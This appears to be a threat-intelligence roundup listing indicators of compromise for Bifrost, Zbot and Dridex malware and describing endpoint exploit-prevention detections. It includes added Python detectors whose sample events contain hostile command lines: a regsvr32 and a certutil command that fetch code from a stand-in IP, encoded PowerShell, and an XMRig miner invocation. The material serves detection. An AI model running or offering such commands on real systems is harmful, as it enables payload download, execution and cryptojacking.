7151719b7ecf17a0193a2ae504598f5c2fb64db5ad68812c2a11cf59f392edc2
a5fcac8fa76442c46d1e48e4104a67399e68a03829e3c60aab67c38d152d9025
a969bed6f7448696349028d766d421094510c7759828473a4a3dd8baf7fa37dd
afd7750169a65f560917f45bdad20b3785d3b8ea3bb4e4335d6a978ceec931ad
b85dc997c286d5e1c94c544310837a28f8b7376d5ff40fbf0af80af9cc43cc8f
b8c5142d09851bb8da18953b38041345f177a1ea49f2101da423f3d148a26631
caa4ce651ab88ad9a49b05e59df3065f8488b9051b3195849775dc29e83957b6
d96e5c17c53670a8bf021f3fcf93f4ec0fc66525bfbe3142f4a6397979534edb
Coverage
Protected by: AMP, CWS, Email Security, Threat Grid
Not applicable: Cloudlock, Network Security, Stealthwatch, Stealthwatch Cloud, Umbrella, WSA
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Win.Trojan.Bifrost-9768974-0
Indicators of Compromise
IOCs collected from dynamic analysis of 25 samples
Mutexes (Occurrences)
Bif1234
20
0ok3s
19
Global\<random guid>
5
uygiuhy
1
Files and/or directories created (Occurrences)
%APPDATA%\addons.dat
19
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp
17
%System32%\Bifrost\msnmngr.exe
11
%System32%\bifrost\server.exe
7
%ProgramFiles%\dell\dll.exe
1
File Hashes
014044854d6020c9db6d48e7b8486449439a93099dc7ca6b08c77cbc37cc9b36
01cd8de48cced53af1973a90fae7b4bc8fb6b3469123cad223cb5bb4f314deca
05bc822e3abb0d52bb2d0a5994bac44008702cbb433cd0f47db87dc7487220a5
067445cf9e876eeef5d2565c5ebabea9e0bd61dacd612bcc1277c705f45534e5
0b5e5b8521844e9b57b4c051db8091a5dcf31dc20edb57d985e486675c29f528
2e06e57e1ef7f22d675e932516c1a9de98d13e0c8b2559dffdf78f07de404375
5c13c2a1d566b0979972f89ce9aaf715e4ca6a33cb22108048f3455ed0d079de
6e026c3936a108c7f807a084e84f8aa671ac9cfe8f6d00050fbf38b29723b572
71a7098854fe637c0fc269f5b03397530e5e6eeac8f364b348f9ce05aa1e7be4
7d271a53df68f1dc6937a6fd1ca9ae6cd05261f2b411bcca019bc741118a09b2
82f6f5a7bc2d8a5f289f042c239afc2240fc4606627542844d5af730d7c24f66
84af638275aa1c9324064d0c787addd462b95c74b00b02c74aef44baff801e16
90563ddf40c0a5e0d403c0b210c1ff80d7dd285456d7f5d02826fc507168052d
91ff6392cdd780b80bf8892d9f36e29d4d0976f378b62d21da12ed0bb03312fd
9a7839ebe87004be96d6ff08fa74b7a7297b1b86bc1b66b267ce440b5d23bc92
a000f2a444b5957fc05704a0c0f2de22d5b01fd25914021eb54e56781d563a0c
a2c4738b274ffad5fcc1e19a3cb567b755c1f699420e3c47f133598d959a8428
b4a1a951e6f42fd8f86df4dc76ab8a59276af598be9391042fe34a8e00ebb968
b91ae2993f51a1622d0648f3dbe3e51cfb0cf104bec1893ceee3e0d5939b6206
baa88c072228039874894caf06a21a911f79153bd227b95f3f6e019576148ffd
bad59dccb676cb40a43cf19cc11f03a1d5f984f9d665d4f7c5df1d678fecd65a
c255bf3121661306c79cd642c8819374e1848252a86b28cf70027ea3100ef567
d7b43408cd35b9901d3907f1cff3b58b7c2a0c458ce0502e7af0df227c4e9691
ddb48749423eee5baaa183d650136e157a323dd508196204b415d14fbb629cb0
ed27f938818b76721be9d3d55bf146c2cb13377699c43d050ee57fa9843a8b6c
*See JSON for more IOCs
Coverage
Protected by: AMP, CWS, Email Security, Threat Grid
Not applicable: Cloudlock, Network Security, Stealthwatch, Stealthwatch Cloud, Umbrella, WSA
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Win.Trojan.Zbot-9769359-0
Indicators of Compromise
IOCs collected from dynamic analysis of 75 samples
Registry Keys (Occurrences)
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
60
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
60
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
60
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\LUAFV
Value Name: Start
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
Value Name: RPSessionInterval
60
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS DEFENDER
Value Name: DisableAntiSpyware
60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER\PRODUCTS\98BE0FA9BD7E903C000098BD76F2968C
60
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: 98BE0FA9BB7E8E3C000098BD76F2948C
60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER
60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER\PRODUCTS
60
<HKCU>\SOFTWARE\MICROSOFT\INSTALLER\PRODUCTS\98BE0FA9BD7E903C000098BD76F2968C
60
Mutexes (Occurrences)
98BE0FA9BB7E8E3C000098BD76F2948C
60
98BE0FA9BC7E8F3C000098BD76F2958C
60
98BE0FA9BCBE8F7C000098BD76F295CC
60
98BE0FA9BD7E903C000098BD76F2968C
60
Global\<random guid>
14
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
103[.]4[.]225[.]41
60
204[.]79[.]197[.]200
19
172[.]217[.]197[.]155
1
172[.]217[.]197[.]100
1
72[.]21[.]81[.]200
1
173[.]194[.]205[.]154
1
173[.]194[.]206[.]95
1
74[.]125[.]192[.]95
1
173[.]194[.]205[.]94
1
172[.]217[.]197[.]93
1
8[.]253[.]45[.]249
1
209[.]85[.]144[.]154
1
13[.]107[.]42[.]14
1
104[.]16[.]53[.]111
1
104[.]18[.]71[.]113
1
13[.]107[.]136[.]9
1
173[.]194[.]175[.]105
1
173[.]194[.]207[.]97
1
8[.]249[.]241[.]254
1
173[.]194[.]207[.]155
1
173[.]194[.]205[.]101
1
128[.]92[.]203[.]42
1
13[.]107[.]136[.]13
1
169[.]47[.]141[.]204
1
99[.]84[.]105[.]15
1
*See JSON for more IOCs
Files and/or directories created (Occurrences)
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C
60
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.exe
60
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.ico
60
%ProgramData%\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C
60
%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Progressive Protection
60
%APPDATA%\Microsoft\Windows\Start Menu\Programs\System Progressive Protection\System Progressive Protection.lnk
60
%HOMEPATH%\Desktop\System Progressive Protection.lnk
60
File Hashes
0026182491fb2b43a099f0eb348bacf4eaf0d7ae9eb99a194bf19cd0f09a084c
*See JSON for more IOCs
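The Zbot registry table above is effectively a checklist of the Security Center, UAC, Defender and service-start settings the samples alter, plus a RunOnce value whose name is a 32-hex-digit product code. The Python below is an added example (not Talos code) that diffs two registry snapshots, reports changes to exactly those value names, and catches the RunOnce name pattern. The snapshot dictionaries and the data they hold (for instance Start=4 for a disabled service, EnableLUA=0) are constructed for the example; the post lists only the value names, not the data written.

```python
import re
from copy import deepcopy

SEC_CENTER = r"HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER"
UAC_POLICY = r"HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM"
DEFENDER = r"HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS DEFENDER"
EXPLORER_POLICY = r"HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER"
SERVICES = r"HKLM\SYSTEM\CONTROLSET001\SERVICES"
RUNONCE = r"HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE"

# (key, value name) -> meaning of a change there; value names come from the Zbot table above.
WATCHED = {
    (SEC_CENTER, "AntiVirusOverride"): "Security Center AV status override",
    (SEC_CENTER, "AntiVirusDisableNotify"): "AV notifications disabled",
    (SEC_CENTER, "FirewallDisableNotify"): "firewall notifications disabled",
    (SEC_CENTER, "FirewallOverride"): "Security Center firewall status override",
    (SEC_CENTER, "UpdatesDisableNotify"): "update notifications disabled",
    (UAC_POLICY, "EnableLUA"): "UAC toggled",
    (DEFENDER, "DisableAntiSpyware"): "Windows Defender disabled",
    (EXPLORER_POLICY, "HideSCAHealth"): "Action Center health icon hidden",
}
for svc in ("WSCSVC", "WINDEFEND", "WUAUSERV", "LUAFV"):
    WATCHED[(SERVICES + "\\" + svc, "Start")] = f"{svc} service start type changed"

RUNONCE_NAME = re.compile(r"[0-9A-F]{32}")  # shape of the RunOnce value name in the table above

def diff_registry(before, after):
    """Return (key, value name, old data, new data) for every value added or changed."""
    changes = []
    for key, values in after.items():
        old = before.get(key, {})
        for name, data in values.items():
            if old.get(name) != data:
                changes.append((key, name, old.get(name), data))
    return changes

def flag_tampering(changes):
    """Map raw registry changes to findings using the watch-list and the RunOnce name pattern."""
    findings = []
    for key, name, old, new in changes:
        k = key.upper()
        if (k, name) in WATCHED:
            findings.append(f"{WATCHED[(k, name)]}: {key}\\{name} {old!r} -> {new!r}")
        elif k == RUNONCE and RUNONCE_NAME.fullmatch(name):
            findings.append(f"RunOnce persistence with 32-hex-digit name: {name} -> {new}")
    return findings

# Constructed snapshots (not from the post): key -> {value name: data}.
BASELINE = {
    SEC_CENTER: {},
    UAC_POLICY: {"EnableLUA": 1},
    DEFENDER: {},
    SERVICES + r"\WSCSVC": {"Start": 2},
    SERVICES + r"\WINDEFEND": {"Start": 2},
    SERVICES + r"\WUAUSERV": {"Start": 3},
    RUNONCE: {},
    r"HKCU\SOFTWARE\EXAMPLEAPP": {"LastRun": 5},
}
INFECTED = deepcopy(BASELINE)
INFECTED[SEC_CENTER].update({"AntiVirusOverride": 1, "AntiVirusDisableNotify": 1,
                             "FirewallDisableNotify": 1, "FirewallOverride": 1,
                             "UpdatesDisableNotify": 1})
INFECTED[UAC_POLICY]["EnableLUA"] = 0
INFECTED[DEFENDER]["DisableAntiSpyware"] = 1
for svc in ("WSCSVC", "WINDEFEND", "WUAUSERV"):
    INFECTED[SERVICES + "\\" + svc]["Start"] = 4   # 4 = SERVICE_DISABLED
INFECTED[RUNONCE]["98BE0FA9BB7E8E3C000098BD76F2948C"] = (
    r"C:\ProgramData\98BE0FA9BB7E8E3C000098BD76F2948C\98BE0FA9BB7E8E3C000098BD76F2948C.exe")
INFECTED[r"HKCU\SOFTWARE\EXAMPLEAPP"]["LastRun"] = 6  # benign change, must not be flagged

def scan(before=BASELINE, after=INFECTED):
    return flag_tampering(diff_registry(before, after))

if __name__ == "__main__":
    for finding in scan():
        print(finding)
```

On a live host the snapshots would come from a registry export or an EDR registry-event stream; the watch-list stays the same, and the benign `EXAMPLEAPP` change shows that only the listed keys produce findings.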
Coverage
Protected by: AMP, CWS, Email Security, Threat Grid
Not applicable: Cloudlock, Network Security, Stealthwatch, Stealthwatch Cloud, Umbrella, WSA
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Win.Packed.Dridex-9768984-0
Indicators of Compromise
IOCs collected from dynamic analysis of 11 samples
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
104[.]23[.]99[.]190
7
104[.]23[.]98[.]190
4
Domain Names contacted by malware; does not indicate maliciousness (Occurrences)
pastebin[.]com
11
Files and/or directories created (Occurrences)
%APPDATA%\Microsoft\Windows\Cookies\0BEYG0U4.txt
11
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp
8
<malware cwd>\old_<malware exe name> (copy)
8
File Hashes
0cd54448b74c09b92d0e7fb8df357735d4799b954a6b31418d188c538ad5bebb
*See JSON for more IOCs
Coverage
Protected by: AMP, CWS, Email Security, Network Security, Threat Grid
Not applicable: Cloudlock, Stealthwatch, Stealthwatch Cloud, Umbrella, WSA
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Exploit Prevention
Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
Dealply adware detected - (9993)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Process hollowing detected - (9460)
Process hollowing is a technique used by some programs to evade static analysis and file-based detection, since the payload never exists on disk in its unpacked form. In typical usage, the parent process unpacks its obfuscated or encrypted contents into memory, then creates a legitimate child process in a suspended state. Before the child runs, its original image is unmapped (hollowed) and the address space is filled with the unpacked code from the parent; the child's main thread is then resumed, so the payload executes under the name of the legitimate process.
CVE-2019-0708 detected - (2395)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free in the kernel-mode RDP driver that can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Because it can be triggered before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (1703)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated or encoded script, has been detected. PowerShell is an extensible scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Installcore adware detected - (798)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Squiblydoo application whitelist bypass attempt detected. - (785)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves the signed Windows binary regsvr32.exe, with scrobj.dll as the script host, executing a scriptlet (.sct) file hosted on an attacker-controlled server, so that no unsigned executable needs to be written to disk.
Crystalbit-Apple DLL double hijack detected - (673)
A Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double-hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Kovter injection detected - (620)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud trojan that can also act as an information stealer. Kovter is also fileless malware: the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Certutil.exe is downloading a file - (429)
The certutil.exe utility has been detected downloading a file, and the downloaded file behaved suspiciously upon execution. The normal use of certutil.exe is to manage and retrieve certificate information; attackers abuse it as a living-off-the-land downloader for additional malicious payloads.
XMRig Miner Detected - (206)
Command line options indicating usage of XMRig Miner have been detected. Malware sometimes uses compromised hosts to mine for cryptocurrency on behalf of the attacker.
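Four of the detections above (the excessively long PowerShell command, Squiblydoo, certutil downloading a file, and the XMRig command line) are visible purely in process command lines, so they can be reproduced over process-creation telemetry. The Python below is an added example, not the AMP exploit-prevention logic itself; the sample events, the 1000-character threshold and the regular expressions are assumptions made for this example, and the miner event deliberately runs under a renamed image to show that the flags, not the file name, are what the rule keys on.

```python
import re

# Constructed process-creation events (not from the post): (parent image, image, command line).
SAMPLE_EVENTS = [
    ("winword.exe", "powershell.exe",
     "powershell.exe -NoP -W Hidden -EncodedCommand " + "SQBFAFgAIAAoAE4AZQB3AC0A" * 50),
    ("cmd.exe", "regsvr32.exe",
     "regsvr32.exe /s /n /u /i:http://198.51.100.7/update.sct scrobj.dll"),
    ("cmd.exe", "certutil.exe",
     r"certutil.exe -urlcache -split -f http://198.51.100.7/a.exe C:\Users\Public\a.exe"),
    ("services.exe", "svchost.exe",   # renamed miner: the flags give it away, not the image name
     "svchost.exe -o pool.example.invalid:3333 -u wallet_placeholder -k --donate-level 1"),
    ("explorer.exe", "powershell.exe",
     "powershell.exe Get-Process | Select-Object -First 5"),
    ("services.exe", "certutil.exe",
     r"certutil.exe -verify C:\certs\server.cer"),
]

LONG_CMDLINE = 1000  # characters; an assumed threshold, tune to the environment

def long_or_encoded_powershell(cmd):
    """Very long or -EncodedCommand PowerShell invocations, the usual shape of obfuscated scripts."""
    if not re.search(r"\b(powershell|pwsh)(\.exe)?\b", cmd, re.I):
        return False
    encoded = re.search(r"\s-e(c|nc|ncodedcommand)?\s", cmd, re.I) is not None
    return encoded or len(cmd) > LONG_CMDLINE

def squiblydoo(cmd):
    """regsvr32 fetching a scriptlet over HTTP via /i:<URL> (normally with scrobj.dll as the host)."""
    return (re.search(r"\bregsvr32(\.exe)?\b", cmd, re.I) is not None
            and re.search(r'/i:"?https?://', cmd, re.I) is not None)

def certutil_download(cmd):
    """certutil used as a downloader: -urlcache or -verifyctl together with an HTTP(S) URL."""
    return (re.search(r"\bcertutil(\.exe)?\b", cmd, re.I) is not None
            and re.search(r"\s-(urlcache|verifyctl)\b", cmd, re.I) is not None
            and re.search(r"https?://", cmd, re.I) is not None)

POOL_ARG = re.compile(r"(^|\s)(-o|--url)[\s=]\S+:\d+", re.I)
XMRIG_ONLY_FLAGS = re.compile(
    r"(^|\s)(--donate-level|--nicehash|--coin|--cpu-priority|--randomx-\w+|--rig-id)(\s|=|$)", re.I)

def xmrig_cmdline(cmd):
    """A pool URL plus at least one flag specific to XMRig's option set."""
    return POOL_ARG.search(cmd) is not None and XMRIG_ONLY_FLAGS.search(cmd) is not None

RULES = [
    ("Excessively long PowerShell command", long_or_encoded_powershell),
    ("Squiblydoo application whitelist bypass", squiblydoo),
    ("Certutil.exe is downloading a file", certutil_download),
    ("XMRig Miner", xmrig_cmdline),
]

def classify(events):
    """Return (parent, image, [matched rule names]) for each event that trips at least one rule."""
    hits = []
    for parent, image, cmd in events:
        names = [name for name, check in RULES if check(cmd)]
        if names:
            hits.append((parent, image, names))
    return hits

if __name__ == "__main__":
    for parent, image, names in classify(SAMPLE_EVENTS):
        print(f"{parent} -> {image}: {', '.join(names)}")
```

The two benign events (an interactive PowerShell one-liner and certutil verifying a certificate) pass through untouched, which is the property worth testing when tuning these rules: the goal is the specific abuse pattern, not every use of the tool.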